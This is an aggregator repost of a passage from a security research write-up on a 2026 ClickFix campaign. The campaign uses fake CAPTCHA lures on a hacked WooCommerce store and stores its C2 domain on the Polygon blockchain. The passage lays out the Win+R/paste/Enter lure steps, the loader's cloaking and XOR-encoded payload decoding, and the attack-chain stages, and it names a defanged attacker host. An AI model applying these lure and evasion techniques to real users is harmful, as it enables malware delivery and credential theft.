RSS

ClickFix 2026: Fake Captcha Hides C2 On-Chain

naveenda1 pts0 comments

ClickFix 2026: Fake CAPTCHA Hides C2 On-Chain | PhishEye<br>Skip to main contentLoginStart Free

ClickFix 2026: Fake CAPTCHA Hides C2 On-Chain<br>PR<br>PhishEye Research<br>June 24, 2026 · 15 min read

Contents<br>Contents

A fake "verify you're human" CAPTCHA is now one of the most common ways malware reaches a desktop in 2026. The trick, known as ClickFix , never exploits a browser bug. It convinces the visitor to copy a hidden command and run it themselves, so the operating system only ever sees a person typing into their own shell. This investigation dissects a live ClickFix campaign that adds a distinctly 2026 twist: its command-and-control (C2) address is stored on the Polygon blockchain , a technique called EtherHiding , which makes the infrastructure almost impossible to take down.

The entry point was an ordinary hacked WooCommerce store. Loaded in a normal browser the site looked clean, because the malicious loader is cloaked and only fires for the right visitor. Behind it sits a professional ClickFix-as-a-service kit with swappable lure templates (fake reCAPTCHA, fake Cloudflare check, fake Blue Screen) and a Polygon smart contract that hands out the current attack domain on demand. Here is the full chain, the decoded payload, the indicators to block, and how to respond if a command has already been pasted.

Editor's note. The compromised site is anonymized as "the victim store": it is a real, legitimate business whose WordPress site was hacked, and naming it before remediation would expose its customers to further harm. All attacker infrastructure is defanged (superboomer[.]world). Do not open the live URLs in a normal browser. The entire point of the attack is to get you to paste a command.

At a glance

Technique<br>ClickFix / fake CAPTCHA, clipboard hijack, infostealer loader

Entry point<br>Compromised WordPress + WooCommerce site (cloaked JS injection)

Targets<br>Windows and macOS desktop users only (Linux, Android, iOS skipped)

Lures<br>Fake reCAPTCHA, fake Cloudflare "verify you are human," fake BSOD, fake browser update

C2 technique<br>EtherHiding : the current C2 domain is stored in a Polygon smart contract

Resilience<br>Domain rotation with one on-chain transaction; no re-infection needed

Status<br>Active in 2026; 97 unique C2 domains across 113 on-chain rotations (Mar–Jun 2026)

What is ClickFix, and why 2026 is its breakout year

ClickFix flips the malware-delivery model on its head. Instead of exploiting software, it exploits the user. A web page shows a familiar-looking obstacle (a CAPTCHA, a Cloudflare check, a "fix this error" prompt) and walks the visitor through three "human verification" steps:

Press Windows + R (or open Terminal on macOS).

Press Ctrl + V ; the page has already copied a command to the clipboard.

Press Enter .

Those keystrokes run an attacker-supplied command, typically a hidden PowerShell or mshta one-liner that downloads and executes an infostealer (Lumma, StealC, or AMOS on macOS) or a loader. Because the victim runs the command, it sidesteps most browser and download protections: there is no malicious file to score and no signed bundle for Gatekeeper to quarantine. Through 2025 and into 2026, ClickFix became one of the most prevalent initial-access methods on the web, and the kits professionalized into ClickFix-as-a-service panels. The campaign below is one of them.

This is the same family as the macOS case we documented in ClickFix Drops Atomic Stealer via Fake DirBuster; what makes the 2026 variant different is everything behind the lure.

The case study: a hacked WooCommerce store

The victim store runs a standard stack: WordPress, WooCommerce, Astra/Elementor, on Hostinger/LiteSpeed . Loading the homepage as a normal desktop browser revealed nothing malicious. That is by design. The injected loader is cloaked : it builds its destination URL at runtime with String.fromCharCode() and injects a element through document.createElement("script") only for targeted visitors, evading casual "view source" inspection and many automated scanners.

That selective behaviour is the hallmark of a Traffic Distribution System (TDS) : server- and client-side logic that decides who sees the attack and who sees a clean page.

Anatomy of the attack chain

Compromised WordPress site<br>│ (cloaked JS loader, built via fromCharCode)<br>Reads C2 domain from Polygon smart contract ◄── EtherHiding (the twist)<br>superboomer[.]world (TDS — "Landing Analytics" panel)<br>│ • log.php → 1×1 tracking pixel (pageview telemetry, per victim site)<br>│ • /api/?a=tds_cfg → targeting config<br>OS check: Windows ✔ Mac ✔ Linux ✗ Android ✗ iOS ✗<br>Fake CAPTCHA landing page (titled "Terms of Service")<br>│ • Hijacks navigator.clipboard.writeText<br>│ • Decodes payload (base64 + XOR 0x83) → new Function()<br>Clipboard poisoned with malicious command<br>│ "Verify you're human: Win+R → Ctrl+V → Enter"<br>Victim runs PowerShell / Terminal command → infostealer / loader

Stage 1: telemetry and targeting

The loader first beacons a tracking pixel and pulls a...

fake clickfix command captcha chain loader

Related Articles

US Government directive to suspend access to Fable 5 and Mythos 5

Dylan131224 ptsfable government anthropic jailbreak access mythos

Is AI ruining our skills? Early results are in – and they're not good

Michelangelo1124 ptstools skills during physicians colonoscopies tool

The Anatomy of an AI-Native Org

kiyanwang22 ptstranslated managers business translation language engineering

Apertus – Open Foundation Model for Sovereign AI

T-A16 ptsopen model apertus foundation sovereign fully

Britain Became as Poor as Mississippi

SanjayMehta15 ptsbritain mississippi next financial crisis self
terms · privacy · disclaimer · contact · policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.